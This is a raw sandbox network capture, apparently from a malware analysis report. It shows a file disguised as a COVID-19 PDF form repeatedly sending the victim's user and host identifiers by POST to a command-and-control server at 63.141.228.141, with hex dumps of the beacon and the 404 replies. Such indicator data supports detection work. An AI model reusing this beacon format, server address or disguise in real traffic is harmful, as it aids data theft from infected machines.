                                        Jul 1, 2021 14:36:34.113523006 CEST | 1386 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                        Data Ascii: (ckav.ruhardz841675DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                        Jul 1, 2021 14:36:34.788209915 CEST | 1393 | IN | HTTP/1.1 404 Not Found
                                        Date: Thu, 01 Jul 2021 12:36:34 GMT
                                        Server: Apache
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 
20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {
                                        Jul 1, 2021 14:36:34.788239002 CEST | 1394 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b
                                        Data Ascii: color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFF
                                        Jul 1, 2021 14:36:34.788250923 CEST | 1396 | IN | Data Raw: 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d
                                        Data Ascii: } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; }
                                        Jul 1, 2021 14:36:34.788266897 CEST | 1397 | IN | Data Raw: 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20
                                        Data Ascii: -align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline; } }
                                        Jul 1, 2021 14:36:34.788281918 CEST | 1398 | IN | Data Raw: 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73 61 31 70 6d 4e 7a 41 58 32 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 49 67
                                        Data Ascii: 1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP
                                        Jul 1, 2021 14:36:34.788295984 CEST | 1400 | IN | Data Raw: 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f 4f 72
                                        Data Ascii: uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/
                                        Jul 1, 2021 14:36:34.788311005 CEST | 1401 | IN | Data Raw: 70 31 36 54 53 43 4f 66 5a 70 70 4d 69 47 44 36 69 56 71 72 32 37 31 6f 56 6f 6b 55 36 41 4a 39 55 35 46 47 6e 58 49 77 77 35 6d 48 2b 6b 4c 45 68 78 49 31 63 6c 32 30 51 43 47 43 54 67 52 4d 41 2f 33 2b 46 32 6c 52 58 58 74 7a 58 68 55 52 50 54
                                        Data Ascii: p16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81
                                        Jul 1, 2021 14:36:34.788325071 CEST | 1402 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65
                                        Data Ascii: <div class="container"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/server_misconfigured.png" class="info-image" />


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        3 | 192.168.2.3 | 49720 | 63.141.228.141 | 80 | C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Jul 1, 2021 14:36:35.267014027 CEST | 1403 | OUT | POST /32.php/fn1ToJTMzu3Td HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 63.141.228.141
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: FAC4DD3C
                                        Content-Length: 163
                                        Connection: close
                                        Jul 1, 2021 14:36:35.425919056 CEST | 1403 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                        Data Ascii: (ckav.ruhardz841675DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                        Jul 1, 2021 14:36:36.150140047 CEST | 1404 | IN | HTTP/1.1 404 Not Found
                                        Date: Thu, 01 Jul 2021 12:36:35 GMT
                                        Server: Apache
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 
20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {
                                        Jul 1, 2021 14:36:36.151612997 CEST | 1406 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b
                                        Data Ascii: color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFF
                                        Jul 1, 2021 14:36:36.151654005 CEST | 1407 | IN | Data Raw: 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d
                                        Data Ascii: } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; }
                                        Jul 1, 2021 14:36:36.151689053 CEST | 1409 | IN | Data Raw: 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20
                                        Data Ascii: -align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline; } }
                                        Jul 1, 2021 14:36:36.151710987 CEST | 1410 | IN | Data Raw: 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73 61 31 70 6d 4e 7a 41 58 32 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 49 67
                                        Data Ascii: 1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP
                                        Jul 1, 2021 14:36:36.151729107 CEST | 1411 | IN | Data Raw: 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f 4f 72
                                        Data Ascii: uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/
                                        Jul 1, 2021 14:36:36.151747942 CEST | 1413 | IN | Data Raw: 70 31 36 54 53 43 4f 66 5a 70 70 4d 69 47 44 36 69 56 71 72 32 37 31 6f 56 6f 6b 55 36 41 4a 39 55 35 46 47 6e 58 49 77 77 35 6d 48 2b 6b 4c 45 68 78 49 31 63 6c 32 30 51 43 47 43 54 67 52 4d 41 2f 33 2b 46 32 6c 52 58 58 74 7a 58 68 55 52 50 54
                                        Data Ascii: p16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81
                                        Jul 1, 2021 14:36:36.151772022 CEST | 1414 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65
                                        Data Ascii: <div class="container"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/server_misconfigured.png" class="info-image" />


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        4 | 192.168.2.3 | 49721 | 63.141.228.141 | 80 | C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Jul 1, 2021 14:36:36.486135960 CEST | 1415 | OUT | POST /32.php/fn1ToJTMzu3Td HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 63.141.228.141
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: FAC4DD3C
                                        Content-Length: 163
                                        Connection: close
                                        Jul 1, 2021 14:36:36.641344070 CEST | 1415 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                        Data Ascii: (ckav.ruhardz841675DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                        Jul 1, 2021 14:36:37.338311911 CEST | 1424 | IN | HTTP/1.1 404 Not Found
                                        Date: Thu, 01 Jul 2021 12:36:36 GMT
                                        Server: Apache
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 
